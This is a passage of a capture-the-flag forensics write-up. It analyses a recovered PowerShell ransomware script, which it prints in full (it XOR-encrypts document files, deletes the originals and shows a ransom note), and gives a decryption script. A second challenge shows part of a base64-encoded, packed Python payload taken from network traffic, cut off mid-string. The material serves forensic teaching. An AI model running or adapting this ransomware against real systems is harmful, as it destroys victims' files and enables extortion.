Where is chrome extension’s ‘chrome.storage.local’ data saved?

mem5

Question 5: What is the URL the user navigated to

mem6

Question 6: What is the password of selene@rangers.eldoria.com

mem7

Cave Expedition [Forensics]

Question: Rumors of a black drake terrorizing the fields of Dunlorn have spread far and wide. The village has offered a hefty bounty for its defeat. Sir Alaric and Thorin answered the call also returning with treasures from its lair. Among the retrieved items they found a map. Unfortunately it cannot be used directly because a custom encryption algorithm was probably used. Luckily it was possible to retrieve the original code that managed the encryption process. Can you investigate about what happened and retrieve the map content?

Flag: HTB{Dunl0rn_dRAk3_LA1r_15_n0W_5AF3}

We are given an encrypted PDF file and event logs to investigate. However, it seems that all the event logs were purged by the attacker except Sysmon event log. Analyzing the Sysmon event log, a batch script was executed and ran multiple Powershell instances to execute different base64 strings.

cave1

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
$k34Vm = "Ki50eHQgKi5kb2MgKi5kb2N4ICoucGRm"
$m78Vo = "LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQpZT1VSIEZJTEVTIEhBVkUgQkVFTiBFTkNSWVBURUQgQlkgQSBSQU5TT01XQVJFCiogV2hhdCBoYXBwZW5lZD8KTW9zdCBvZiB5b3VyIGZpbGVzIGFyZSBubyBsb25nZXIgYWNjZXNzaWJsZSBiZWNhdXNlIHRoZXkgaGF2ZSBiZWVuIGVuY3J5cHRlZC4gRG8gbm90IHdhc3RlIHlvdXIgdGltZSB0cnlpbmcgdG8gZmluZCBhIHdheSB0byBkZWNyeXB0IHRoZW07IGl0IGlzIGltcG9zc2libGUgd2l0aG91dCBvdXIgaGVscC4KKiBIb3cgdG8gcmVjb3ZlciBteSBmaWxlcz8KUmVjb3ZlcmluZyB5b3VyIGZpbGVzIGlzIDEwMCUgZ3VhcmFudGVlZCBpZiB5b3UgZm9sbG93IG91ciBpbnN0cnVjdGlvbnMuCiogSXMgdGhlcmUgYSBkZWFkbGluZT8KT2YgY291cnNlLCB0aGVyZSBpcy4gWW91IGhhdmUgdGVuIGRheXMgbGVmdC4gRG8gbm90IG1pc3MgdGhpcyBkZWFkbGluZS4KLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQo="
$a53Va = "NXhzR09iakhRaVBBR2R6TGdCRWVJOHUwWVNKcTc2RWl5dWY4d0FSUzdxYnRQNG50UVk1MHlIOGR6S1plQ0FzWg=="
$b64Vb = "n2mmXaWy5pL4kpNWr7bcgEKxMeUx50MJ"

$e90Vg = @{}
$f12Vh = @{}

For ($x = 65; $x -le 90; $x++) {
    $e90Vg[([char]$x)] = if($x -eq 90) { [char]65 } else { [char]($x + 1) }
}

function n90Vp {
     [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($m78Vo))
}

function l56Vn {
    return (a12Vc $k34Vm).Split(" ")
}

For ($x = 97; $x -le 122; $x++) {
    $e90Vg[([char]$x)] = if($x -eq 122) { [char]97 } else { [char]($x + 1) }
}

function a12Vc {
    param([string]$a34Vd)
    return [Text.Encoding]::UTF8.GetString([Convert]::FromBase64String($a34Vd))
}

$c56Ve = a12Vc $a53Va
$d78Vf = a12Vc $b64Vb

For ($x = 48; $x -le 57; $x++) {
    $e90Vg[([char]$x)] = if($x -eq 57) { [char]48 } else { [char]($x + 1) }
}

$e90Vg.GetEnumerator() | ForEach-Object {
    $f12Vh[$_.Value] = $_.Key
}

function l34Vn {
    param([byte[]]$m56Vo, [byte[]]$n78Vp, [byte[]]$o90Vq)
    $p12Vr = [byte[]]::new($m56Vo.Length)
    for ($x = 0; $x -lt $m56Vo.Length; $x++) {
        $q34Vs = $n78Vp[$x % $n78Vp.Length]
        $r56Vt = $o90Vq[$x % $o90Vq.Length]
        $p12Vr[$x] = $m56Vo[$x] -bxor $q34Vs -bxor $r56Vt
    }
    return $p12Vr
}

function s78Vu {
    param([byte[]]$t90Vv, [string]$u12Vw, [string]$v34Vx)

    if ($t90Vv -eq $null -or $t90Vv.Length -eq 0) {
        return $null
    }

    $y90Va = [System.Text.Encoding]::UTF8.GetBytes($u12Vw)
    $z12Vb = [System.Text.Encoding]::UTF8.GetBytes($v34Vx)
    $a34Vc = l34Vn $t90Vv $y90Va $z12Vb

    return [Convert]::ToBase64String($a34Vc)
}

function o12Vq {
    param([switch]$p34Vr)

    try {
        if ($p34Vr) {
            foreach ($q56Vs in l56Vn) {
                $d34Vp = "dca01aq2/"
                if (Test-Path $d34Vp) {
                    Get-ChildItem -Path $d34Vp -Recurse -ErrorAction Stop |
                        Where-Object { $_.Extension -match "^\.$q56Vs$" } |
                        ForEach-Object {
                            $r78Vt = $_.FullName
                            if (Test-Path $r78Vt) {
                                $s90Vu = [IO.File]::ReadAllBytes($r78Vt)
                                $t12Vv = s78Vu $s90Vu $c56Ve $d78Vf
                                [IO.File]::WriteAllText("$r78Vt.secured", $t12Vv)
                                Remove-Item $r78Vt -Force
                            }
                        }
                }
            }
        }
    }
    catch {}
}

if ($env:USERNAME -eq "developer56546756" -and $env:COMPUTERNAME -eq "Workstation5678") {
    o12Vq -p34Vr
    n90Vp
}

Analyzing the Powershell script, it seems to be a straightforward encryption function. Hence, we can decrypt the PDF file by reversing this function (credits to @abdelrhman322 for his script).

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
function Decode-Base64 {
    param([string]$data)
    return [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($data))
}

function Decrypt-XOR {
    param([byte[]]$data, [byte[]]$key1, [byte[]]$key2)
    $output = [byte[]]::new($data.Length)
    for ($i = 0; $i -lt $data.Length; $i++) {
        $output[$i] = $data[$i] -bxor $key1[$i % $key1.Length] -bxor $key2[$i % $key2.Length]
    }
    return $output
}

$key1 = Decode-Base64 "NXhzR09iakhRaVBBR2R6TGdCRWVJOHUwWVNKcTc2RWl5dWY4d0FSUzdxYnRQNG50UVk1MHlIOGR6S1plQ0FzWg=="
$key2 = Decode-Base64 "n2mmXaWy5pL4kpNWr7bcgEKxMeUx50MJ"

$encryptedData = [System.Convert]::FromBase64String((Get-Content "map.pdf.secured" -Raw))

$decryptedData = Decrypt-XOR $encryptedData ([System.Text.Encoding]::UTF8.GetBytes($key1)) ([System.Text.Encoding]::UTF8.GetBytes($key2))

[System.IO.File]::WriteAllBytes("decrypted_file.ext", $decryptedData)

Write-Host "Decryption complete. File saved as decrypted_file.ext"

cave2

ToolPie [Forensics]

Question: In the bustling town of Eastmarsh, Garrick Stoneforge’s workshop site once stood as a pinnacle of enchanted lock and toolmaking. But dark whispers now speak of a breach by a clandestine faction, hinting that Garrick’s prized designs may have been stolen. Scattered digital remnants cling to the compromised site, awaiting those who dare unravel them. Unmask these cunning adversaries threatening the peace of Eldoria. Investigate the incident, gather evidence, and expose Malakar as the mastermind behind this attack.

Flag: N/A

We are given a PCAP file to investigate and several questions to answer. Once all questions are answered, the challenge is considered solved.

pie1

Question 1: What is the IP address responsible for compromising the website?

Analyzing the HTTP traffic, an obfuscated Python script can be identified being uploaded from 194.59.6.66 in one of the website endpoints.

pie2

Question 2: What is the name of the endpoint exploited by the attacker?

Similarly, the website endpoint can be identified in the HTTP packet.

pie3

Question 3: What is the name of the obfuscation tool used by the attacker?

One easy way to cheese this question is to modify exec() to print() and execute the Python script directly. Once executed, the obfuscation tool can be identified and it seems to be a Python bytecode.

pie4

pie5

1
2
3
4
5
6
import base64

encoded_script = "aW1wb3J0IG1hcnNoYWwsbHptYSxnemlwLGJ6MixiaW5hc2NpaSx6bGliO3ByaW50KG1hcnNoYWwubG9hZHMoYnoyLmRlY29tcHJlc3MoYidCWmg5MUFZJlNZXHg4ZCp3XHgwMFx4MDBcblx4YmJceDdmXHhmZlx4ZmZceGZmXHhmZlx4ZmZceGZmXHhmZlx4ZmZceGZmXHhmZlx4ZmZceGZmXHhmZlx4ZmZceGZmXHhmZlx4ZmZceGZmXHhmZVx4ZWVceGVjXHhlNFx4ZWNceGVjXHhjMD9ceGQ5XHhmZlx4ZmVceGY0InxceGY5YFxyXHhmZlx4MWFceGIzXHgwM1x4ZDFceGEwXHgxZVx4YTlceDExXHgwN1x4YWNceDllXHhlZlx4MWVceGVlelx4ZjVceGRiXHhkOUpceGRlXHhjZVx4YTZLKFx4ZTdceGQzXHhlOVx4Y2RceGE5XHg5M1xyU0BNXHgxMzQmXHJceDExXHg5NHhGXHgxMVx4YTZceDg5XHhiMlx4OTlceGE2XHg5NFx4ZjBceDFhaVx4YTFceGE2XHg5YVx4MDNBRlx4ZDFceDFlXHg5ZVx4YTFceDlhXHhhN1x4ODlceGE2TFx4ODRceGY1XHgxYXlDXHhkNDR6XHg5OTNTIGhcclx4MGYpXHhlOVx4MDNAXHgwM0xHXHhhOVx4YTBceDFhXHgwNERJXHhlOFx4MTkkXHhmNFx4YzlceGU5MmFceGEzRFx4YzlceDlhTFx4MTFceDgxT1wnXHhhNFx4OWVceDkzNT1NXHhhNFx4ZDBceGQxXHhhNiZGXHg4MVx4OTNMXHg4Nlx4ODBceDAwXHgwMFx4MDZceDgwXHgwMFx4MDBceDAwXHgwMFx4MDBceDAwXHgwMFx4MDBcck1cdDRceGQxXHg4MExcdFx4OTFceDE4XHhhOVx4ZTRceGM2XHg5NFx4ZDhceGE3XHhiNU9TXHhjOVx4YTQ9I1x4ZjU0XHhkNFx4MDZqXHgwN1x4YTlceGVhelx4OWFceDFlXHhhMVx4YTB6XHg4Nlx4ODNNXHgwM2poXHgwMFx4MDNBXHhhNkBceDFhXHgwMFx4MDBceDAzXHhkNFx4MDBceDFlXHhhN1x4OTQ0XHgwMDU9XHgxMFx4OTNceDEwXHg5YkBceDk5NFx4YzhceDk5XHhhM0pceDFiTVx4MWFqeU9GXHhhNlx4OThceGNhYlx4MGNceGQxNlx4YTBtJlx4OGZIXHhkM0A0NFx4MDFceGEwXHgwMFxyXHgwM0BceDAwNFx4MTlceDAwXHgwMFx4MDBceDAwNFx4MWFceDAxVTQ0XHgwMFx4MDNAXHhkMFx4MWFceDAwNDRceGQwXHgwNkBceDFhXHgwMFx4MDA0XHhkMFx4MThceDk4XHg4NkA0MmRceDAwaFx4MWFkXHgwMFx4MDBceDAwXHgwMDRoXHgwMFx4MDBceDAwYFx4OTEkQmhoNGBceDlhXHgxOVx4MDRceGMzQFx4YTlceGVkU1x4ZjRTXHhkMlx4MWJceGQ0XHhkYSZNJlx4ZDJtI1x4Y2FpXHhmYVx4OGNceDkzZT1AXHgxZVx4OTFceGEwelx4OGNqaFx4ZDFceGE2XHg4MFx4MDBceGQwXHgwMDRceDFlXHhhMFx4MDFceGEwXHgxYTRpXHhiNTRceGQzXHgxMFx4MWZceGRmXHhjYlx4OThceDk5XHJceGExXHJceDhjYFx4ZDg2XHgwY2RceGU5XHhjM1x4MDZceDlibTZceGRibVx4MWJceGYxIlx4ZjBceGQyXHhhN1x4ZDVwLFx4MTcxZ0FjR11WXHhjZnZyXHg5ZVxyXHg5ZD1ceDEzP05ceGZhXHg4YnczbGBceDBlXHgxY1x4ZGFceGRjXHhiMFZVXHhhMFx4ZTdceDhkZj4kXHgxMFx4YjVceGYyK2Z1XHhkNlx4ZDVceGVkXHg5YVx4OWN8Ylx4YjFceGM0XHhkMVBceGQwXHg5NVx4ZjhceDEwXHhjMFx4YjhceGQyXHgxMFxcIDlceDgzVUYjXkhceDEyXHgxMlx4OTFceDk4XHg5Y1x4MWRceDg5QlFceDhlQ1x4OTJceDA2Nlx4OGJEcFx4OGFceGFhXHgwM2UlXHhhZFx4YzRceGU1b1x4OGZceDAxXHhhMFx4MTFceDg0XHhhY1x4YjhIXHgwMV5ceGI3XHg4NHlceGVkXHgwY1VceGIzN1x4ZDdbd1x4ZGRtXHhmNFx4ZjlceGRiXHhlZTdceGE2XHg5OFx4ZTItQVx4ZWFceDFjXHhkNlx4YmVceGJmMVx4ZTJceDAzXHg4OUE6Mlx4YjBuXHgwYlx4YzE2OVx4OGFceGFiXG5cXFx4YTRceGEwXHhiYnsgXHgxMVx4YTdceDFlLVx4YmMsUGBGXHhhZFx4MDhceGUxXHg4ZFlceDliXHgwMixceDhjcyNlZyVceDk3XHgwNzFceGRhXHhlOFhBfD5ceGExXHhhZVx4YWFoJVx4YzRdXHg5NXcqNGlbXHg4NVx4ZWVceGVlPVx4Y2ZceDkzNXFceDAydW8iXHhhZlx4ODEvXHhjMFx4Y2FceGJkRjtceGY2XHhlZlx4YWFceDk5QS8gXHg5MVx4ZWZceDBiXHhlMVx4ZDlceGE0YHdceDllXHhjNlx4ODhceGYyXHhhOVNceGUzXHhhNnhceGFmfFx4MGIqSUVceDAyXHg4YShOTFx4MDBdP1x4MTJceDEwcD13XHhjNlx4OTJHXHg4YVx4ZDJceGZmXHgxN31+eTNceGUzXHhlOWZceGYxXHhmZlx4YWZceGYyXHhhNVx4YjlceGE1XHhjY1x4ZmQ7V1x4ZGRceDFlXHhjZFx4OWVceDBiRDVceDBiXHgwZlx4YzZ3RldcXFx4ZDVceDhkIEdoXHhjMVxufHgyXHg5OSZceDhlXFxceGE1QmFceDdmNiFceDEwXHhlNFx4ZDBwXHgxOFx4OTBceDk3azRceDFhXHhlY0BceDFifn5ceDhkXHhmZVx4ZWVceDk2XHgwN1x4OGZceGQ2XHhlMVNTXHhjZE92XHg4Y1x4ODlceGQySVx4MTUwXHhhNVx4ZGRceGFhPkVceDA3XHhkYlx4ZjhsXHg5N1ZceGEwXHgxY1x4OGRceGQ5XHhhNTBceDE3W2hceGQxXHgwMlx4MDghZlx4YWRceGVhXHhhMCJceDg4XHhjZUNceDBjXHgwZlZHXlx4YzBceGVhX1x4MTBceGJkXHhhMW17NUlMXHhiYlx4ZDJceDlhblx4MDdceGQ5YVx4OThqZ0l3ciYmXHgwNlx4MGNceDhhSFx4ZTczXHhkZFx4YjFceDA1MFx4OWZceDFmXHgxZlx4ZTFKXCdceDlkXHg4Y1lceGE4XHgxMVx4MGJceDA4XHgwZmQqXHhmMlx4OWRceGMyXHg4NCRceDEwXHg4YVx4ZDlceGMxXHhlMDVceGVjc1x4ZGVDXHg5YVx4ZDFceGI3XHg4NVx4MGVOaUpqMlx4OWFnXHgxMlx4OTRNKVx4ZDJcclx4ZjNceGE4XHg4NFx4YzlceGMyXHgwNlx4ZTFceDE0XHhkYVx4ZDFceDFlXHgxYlZceDFhXHgwYlx4ZTY2Nlx4YzZ+Vlx4ODEvclx4OThceDk1XHhmMmdceGM3TW08XHhlZFx4YjBceGU5a29ceDAxXHhjYjRceDg4XHgxN1x4ODRceDhhIkpceDliSlx4MThceDBjaDtceDg0XHR2XHhjYlx4YmFFTFx4OTlceGRmXHhhYSlxL3Q6NDVceGJhXHhiZlx4ODRWXHhmNVx4YjNceGFkXHg4Y1x4ZWVceDExXHhlMihceDE4Plx4ZWEzXHhhOVx4OThceGE4Qlx4Y2ZceGI1XHhkY1x4ZWRceGFjSTxceDkwXHgwNlx4MWQwKVlAXHg4Nlx4MDdceDdmXHhlZVx4YjlceGY1e21ceGRmXHg4M0hmXHhiM1RceGQyXHhkZlx4OWNceGM2XHhhYlx4YWNceDEzXHg5OVx4Y2JceGVjXHhmNUtceGYyXHg4MFx4Y2VceDlmQ1x4ZjR3XHhlYlx4MWZhXHgwOFx4ZDhcclx4ODA8JVx4OTB3XHg4Ylx4ZTh9XHg4ZFx4ZGFceDk2XHhjZilceDFhXHhiYUQuXHhhM1x4YzJceGU1RVx4ZTNceGM5cFx4YTgmd1x4MTBceDE0XHhjNiR2LUlceGQ5XHhiZFx4Y2ZceGJmXHhlMVx4Y2VceDE5XHhjZGZceDA3XHgwYlx4N2ZceGQ3XHhjODpceGE2bndceGZjPU1cXG5ceGM3XHgwMlx4OTZcblx4ODUiLmpceGE4R31ceDA0XHhlZlx4MWUrXHhiMCk0XHg4MkdfXHgwNVx4ZmVceGJlXHg5NFx4ZjNceDAzXHhkNCpceGUyXHhmN1RceGE4XHg5N1x4OTdceGMzWFx4OGFceDlhO1x4OWFceGJlaVx4YzlceGFkXHhkMVx4ZDJceGNmXHhkZTRmcHpceGNlXHJZXHhhNVx4YTJzXHhhZFx4ZjgoU1x4ZjMqXHg4NVx4ZWEkXHgxNFx4MThceGI2XHgxYVx4YmJceGM1Lk9ceGMzXHhiN1x4ODlceGViOVx4MWE0XHhkM1x4ZTBceDk5OXJceDk5XHg5YShceDg0XHhjZVx4MTdceDBia1x4YTU5XHhkMlhceDg4XHg4MTVceGFiXHgxMHhceDlmXHhiN1x4YzVceGU3X1JceGFhXHhhYVx4YWJceGYyXHg5ZVx4ZTFceGI5XHg4YUtceDkxXHhhM1x4YTFceGE3XHhjMFx4OTRceDhmM1x4Y2FceDgyXHg4YXpZXHhjNGdceGVkXHhjZlx4YTlCTzpgXHhiNVx4MWIyXHgxMlx4YmJceDg5XHgxN1ttXHhhMlx4ZThceGM0XHgwY3RKLy1ceGE1XHhiZlx4ZjFceGZmcVx4N2ZceGRhXHg5YVx4ZDlceDAwXHhiMlx4MGJceDk4TFx4N2ZceDE3XHhiNFx4YzlnfVx4MWVceGZlU2ggXHhjM1x4OThmSXFceDA1XVx4YjFceDhhQlx4OThceGM3XHg5NFx4MDM9MiZceDA2dkBzXHgwZlhceGIzXHhhZFpceGNmXHhhY1x4ZjZceGFlXHhlMlx4MGJceGFhXHhlNFx4OTlceGYzXHhmNTxceGQ3XHg4MW11XHg4N1x4YjVceDk3XHhkMlx4YzNceGI0cFx4YjVceGFkXHhkOXlceDE1XHhmMlx4MDYsXHhhNztceGUyXHhlNFx4Y2FIXHhiZlx4ZDVceDkyQFx4YWVceDBjXHg5MVx4ZGREXHg5YnlceGQ1XHhjY2pceDdmXHhhOVx4MTlceGFkXHhhM1x4MDdceGJkSVx4ODRceGE5fGsvXHgwZjc9amlceDEyXHhiYVx4ZDRceGZhSVx4OGNceGE5XHg5NFxuXHg5Ylx4YTQzXHgwZVx4YTZPXHhkM1x4OGRceGY1XHg4M1x4MDZceGQ4XHhhZWhobFx4MDUqO1x4ZGFceGFhXHhkOWhlXHhjOFx4OGYyIVx4OThceGQ2LUJceGE5XHhjZlx4OWFceGI5X1x4YTRceGVjXHhkYVx4MDg8XHhlM1xyXHhlZW1ceDFlbFx4ZDhceGZjfTNceGM0XHhiYWxceGU1LFBceGU0Xlx4YWUtXHg5N1x4OTFqMFx4ZWNceGM4YkJceDg1XHhkMS5ceGY1VFx4YTRceGYxXHg4M1x4ODlceGM0LVxcXHgwMFx4ZjBceGJiXHgxYVx4ZDJceDg5S1x4YjU4XHg5Nlx4ZTJceDg4XHhkZDxxXHJceGJiMFx4YzRBY1x4OTUudlx4OTRceDA4Plx4Y2FceDhiXHhmNVx4YTFceGFmXHgxZlZIXHgxNlxuXHhmZStceDAyXHg5Zlx4ZTlceGE3VlBceDFhXHgwM21ceDAxXHhhYlx4MGJceGY4XHhkMSZceGFjcVx4YWRnXHgwZlx4ZmNceDk4Tlx4OTFYUlFceDg4XHhjZi0gNEtceDg0cSJceGVjXHhiMlx4OGNceGU2ZVx4ODYgXHg5ZmZceDEwXHg4M3BceGM1XHhjMUNceGY0XHg4YzVceGRhXHhlNVx4ODIpXHhjZlxuXHhiZldaXHhjMFx4ZDFceDliYFx4YWNGdFx4YmFceGVkXHhhZiNceGM4XHhmOFx4OTZceGU5PVpkXHhhNGhceGEzZD5ceGIyXHhlY1x4YWNceDk4XHhlNiVceGNhXHhiMnJceGUyXHhkN1x4YjVceDgwXHg4Y1x4MWNiMFx4YWRDXHg4YVx4ZGJceDFlXHgxZFx4OWVrXHhmMD5ceGNmXCc3PVx4OWJceDE5XHhkZWVAXG5ceGFhXHhhY1x4ZDJOJSRceDkxXVx4YTdceDEzY1x4ZTdceGNlXHg5NVx4OTZceDgxWWhcblNceGQxXHhkY1x4YjVceGUzZHtceDEzXHhjNVx4ZWF1MjJceGNjXHhlY1x4ZTFceDE5XHhiNlxuXHg4ZT9cblx4MDFceGRleVx4MDR0XHgwMiJAXHg4Mlx4MTJKXHg4OFx4ODZceDFiXHg4M1VuXHgwM1V5XHhlZFx4ODJceGMzXHgxOVx4ZGRceDg2XHJceGRhXHgxYVx4ZGVceDdmXHgxNFx4OTBceGIzXHhhZj9ceDA1XHhkM1x4ZjBceDA1XHhlOVx4ODVceDgzXHg5OW1ceDhhZVx4ODZceGQ1OVpsXHg4M2lceDA0dTxceDkyXVx4ZTlceGNhXHhiY1x4ZjVrXHhjZFx4OGUsXHhjMVx4ZmNVXHhjN1x4ODQlfD5ceGZidFx4OWNceDA0XHhmMH1ceGNlUXxXeVx4OWVOXHhhOFx4MTkjXHgxMlx4OTRceGYxXHhmZFg1YFx4MTlceDBlXHg4N053Q1x4YTVceDgwcFx4YjFceGQ5XHhjNzNGXHhlOFx4YTVceDljXHgwMFx4ZTVceGIxKVx4ZDNdXHhhNlxyXHg5ZFx4MWFceGRkXHhhNFx4OTFceGI5en1ceDFiZ1x4MTJceDllPFxuQlx4ODhceDBlXHhkZjpceDFjXHRceGMzXHhhM1x4ODVceDFiXHg5OHlceGVjXHgwY1x4OWFceDEyUHJceGNkQ1x4ZWExXHg3Zlx4MDFceGVmXHhjM1x4YjBceGRkMTZceGU3XHgxZVx4ZjdceDFmdjRceDE3XHJceGQzXHg4Nlx4Y2VFQFx4Y2VceDE1VFx4Y2VceDAwXHhmM0BceGQ5XHJceDA1XHgxOUBWXHgxYyJceDg2XHhhNlx4OWMmLFx4MDVceGE2JVx4MDJuKF45XHg4Nlx4YTY1I1x4YzhceGI1XVx4ODhceDhlXHhhMiwxXHhjM3UyXHhlMFx4YTggXHgwMVx4ZmYifFx4ZmZHXHgwYjZceGJlVVx4OGFceGY3O1lEXHhkYVx4YjR1KWxceGY2flwnXHgwZVx4OWJceGIzL1x4OThRMVx4MDRceDEySklbXHgxMSpceDgxXHRceDA3XHhjYlx4YWR3XHhjOVx4YmZceGJmXHhiZVx4YmFhXHhjNlx4Y2VceDllKVx4OTh2XHgxNVx4MDFqXHhhMTVceGJkXHhkMFx4Y2IuXHhlM1x4ZDdceGEyYFx4MTVceDllXHg4NTRceGQzXHgxYW1cclx4MTNBXHg5YVx4YTVceDBiXHJceDgxXHJceGI5XHhiMyUpQm1yXHgxMkxccj5ceDg3XHgwN0tceGVhXHhkZW5ceDg3XHgwMWM2JVx4ZWFceGE1XHhkOFx4YjU0XHhjMFx4Y2FceGI4U0Jke09ceDljIFx4ODhceDg2XHhlZS04MFx4ODFWdlx4MDhbUFx4YzIyMVx4OWUgJix0XHgxMS85XHhlMFx4ZDBceDFmXHgxZFx4Y2RceDk0XHhiOVx4OTVceGM3Vlx4Y2JceGQ2XHhmMk1ceGY3XHhmNGdUXHhhMlx4MTlceDk0XHhkOVx4ZmJceDdmXHgxNVx4OTBceGM1XHhiMiZceDllfVx4MGNxXHhlOFx4ZGMoXHgxYXtsXFxceDg4XHhiOFx4YWI9XHg4Ylx4YWFDbVx4YzBceGNiXHhiNXc9XHhmOFx4ZmZceGEzXHhkZllceDk0XHhhNVx4YTVceDlkMFx4MDRVXHg4YWxceGI4aXdceGEzXHhiMCVceGYxIFx4MDNIXHg4MFx4Yzkkdlx4ZTZceDk4fCNEWVBceGE0XHhmZVwnXHgwNFx4ZTAmXHg4OCtceGViXHhjZTpceGEwY20sXHgxYVFceGZkTlx4MWNceDk3XHhhM1x4OThceGI1cVx4MWNceGVmRVx4YWJFQ1x4YWFceDgyXHgwMFx4OGNceGNiXHhlZVx4OGRceGQ2bFx4ZTVcXFx4Y2E7XHhmOWRceGQ0XHhhNVx4YWVuXHhmYVc9XHg4OGtVOVx4ZmVceDk1JmNceDEzXHgwY0w3KzVceGUyXHhkZV9ceDlmXHhmNnRceDA1SG5ceGUyXHhmZlx4OWR6aVx4OWFceDAzQGB1XHhlYVx4OThceGI1XHg4ZVx4ZDlceGEzV1x4ODVceDk2T1x4ODVceDliZlx4YzFceGI2XHhhNHhceGEyLz1ceDBmXHhhNlRceGRlXHhhY1x4YzZceDg0XFxceGE1cSBceDhlWlx4ZDVwKi1xQyVceGVjXHg4NWFIXHg5MD5ceGMxXHg5NyVCQFx4MTJCInVceGQ1Ulx4MGZceDEwYCZceDlhaVx4MWNsKkZceGVmT3JceGFlZVx4YWZceGE5XHg4OHFceGEyazkzXHhlNlx4ZjZceGY1XHhhOG5ceGQwXHhmNDJceGU1PFx4Zjd9XHhhZFx4ZGNceGQ0KUxceDExXHg5N1x4ZDRceDkyXHgxMUVceGUxXHhhMFx4YTRceGU0e1x4OWFceGU2VFx4ZGEgXHhlZVx4ODNceGI3XHhjZVx4MTdceGIwXHhiM1x4MGNceDExXHg4Zlx4YzF0XHgwY1x4YjVceDg3XHg5ZVx4YmJceDBmXHgwZnFsXHhlOFRceGM1XHgwMitFXHhkZFx4YmNRXHg5Mlx4YjhceGI4XHhjOCosKEtcdFVrXHgxNlx0XHg4Nlx4YjlAXCdceDA0XHhjMWwmXHhjZilceDFmXHgxNFZceDBiXHg4MFx4ZDJcclx4YWJceGVjXHgwNykgXHgwY1x4MGZceDgwXHhlZVx4MTZceDE0XHhmOVx4OWNceGNiS0VceGVkYDs1XHhhOVx4YzJceDEwNVhbXHg4N1x4ZDZqXHg5NVx4MThceGNhWVx4OTlceGJhXHhlNlx4ZThceDA0cVx4ODM0NFx4Y2VXXHgwMFx4MDVceGM0XHgxNVx4ZmJceDgyXHhlYTlceGZjSlx4YTNMXHg4ZVxuXHhjMVx4YjRceGIzc1lceDg0YFx4OThceDk5XHhjY3lceDBme1x4MDJQXHg4ZVxuXHhiM1x4ZTVceGVjbE5ceGE4XHhiNV1ceDg0IUlceDgwXHhhNFx4OGF0Jlx4ZTRldVx4YmFceDE1VFx4MWZ2XHg5MGZ4XHg4MVA5XHgxYVx4ZjVHXHhhOVx4YTJceDljXHhlZFx4YzRXXHhhMFx4YmJceGE1alx4MWVceDFiXHhkOSVKXHhiM3oxSWBceDE5c1x4ZDlceGIwXFxceGNhXHhmZGRceGQ1NCFceDgyOVx4YzJ8XHgwY1x4ZWRceGRiXHgwZVx4ZGU6XHhjYiVsLVx4ZjZceDhmXHhlZlx4ZGVceGUyXHhhNWhceGI2ZVx4YzVceGM3IVx4YzYgQEJceDk3Llx4YzIsflx4ZjhceDhhXHgxNFx4OTRceGViXHg4ZW1SXHhmOFx4ZmJceGE1IlFkXHhjMFx4ZTZceDgxXHhiZVx4OWZjPXNceGQ2LFZceGNhXHhiMVx4ODAhVVx4OGNceDgyIlx4ZGRtZVx4YmM9XHhmOVx4MWJceGZjXHg4ZFx4ZTYrXHhjM1x4Yzg6eVx4ZTJceGZjWlx4MWNceDg4XHg5ZntceGRiWktceGIwIyxceGI4XHg5Zlx4MTBceGUxXHgwM1x4YjBIXHg3Zlx4ODl3XHhlZVx4ZDdceDlkdnhceGFmb1x4OTh2Z2UlXHhkYyJceGQxXHgwZlx4OWRRP1x4ODNOXHhlM1x4YjRceDE0aiV8Q1x4MDhceGIwXHgxNktceGMxSFx4OWRceGY4XHhiY1x4ZjRceGFlXHhhN1x4OGFBXHhkMFx4YmZDTVx4ODV3XHg4MiljXHhjY1x4ZDRceGNhVlx4YzUyalx4MTRPYkImXHhlN05RXHg5ZVwnOTNNXHg4ZmAhXHhjY1x4ODAjJVx4MDRceGQyXHhlYiJUXHhiZVx4OGQwXHgwNFx4YTVceGFkXHhhM1x4YWJceGY2XHhkNVx4ODZceGUyMTRceGIxXHhhNlx4MTJceGE2KnRceDk0UVx4MGMhXHhjMVx4ZTAjXHgxOFx4OGFceDgxXHhlNFx4MTJBXHhjY0tceGM2XHhhM1x4YTlceGQwa2hceGJiXHgxMW1ceGQ3XFxceGU2XHhlOHdyXHg5OTBceGMwXHg4M1x4ODVcckNceDlkXHhjOFx4YzdceGZjdlx4ZjhZL1x4OTNceGMzME5GZVx4YzJceGY3c1x4OTFceGI3Qlx4YTZceDEwYmJceDExXHgxOFx4YjBceDE5XHhmNFx4YTFYXHhiOVx4OTJceGIzXHhkYytceDk2Mlx4OWNceDBidFx4ZDlsLCZceGU4XHgxZlx4MGJceGZlXHhmNFx4YjdceGNkXHgwZVx4MTFceGM5I1pceGIwXHg5MGQyXVx4MDZceDg5XHhjZFx0XFxceGEzXHRceGFkXHg4ZFx4OWJceGU1Wlx4ZDBceGE2XHhhNzNxez5fXHhkN1x4ZGRceGUyMVx4ODNceGEya1x4MDRET1x4YzBBZztaXHg5OTtceGRmXHgxNFx4OWU8XHhlM3ZceDFkXHg5OVx4OGJceDlhXHg5OGRceGU2XHgwNVx4Y2QpXHg5NFx4YzJceDliOkYgXHhjZEdceGRlUFx4ODY5XHhkZClrZ1x4ZDJceGRlKlx4MWFceDljXHgwNFx4MTBceDEyelx4ZGE0XHg4ZCxceGNiXHhlY1x4Y2JSXHg5OVx4MGZceDljXHg4MVx4MDhceGVhcnpceGU1Ulx4MTdcJ1kuPVx4OWVsXHhlOVx4YzRceGVldzBceDA4XHgwNlx4YzBnL21ceGUwXHhmMDRceDFjXHgwY1x4ZmNOXHhjMFFceGFhXHhiZlx4YzVceGU4XHhhMHk1XHg4OFx4ODNceGR